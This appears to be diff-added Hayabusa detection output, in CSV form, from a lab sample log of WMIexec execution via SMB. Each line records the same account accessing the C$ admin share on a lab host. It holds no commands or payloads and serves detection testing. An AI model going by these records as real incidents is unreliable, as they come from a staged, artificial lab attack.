+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
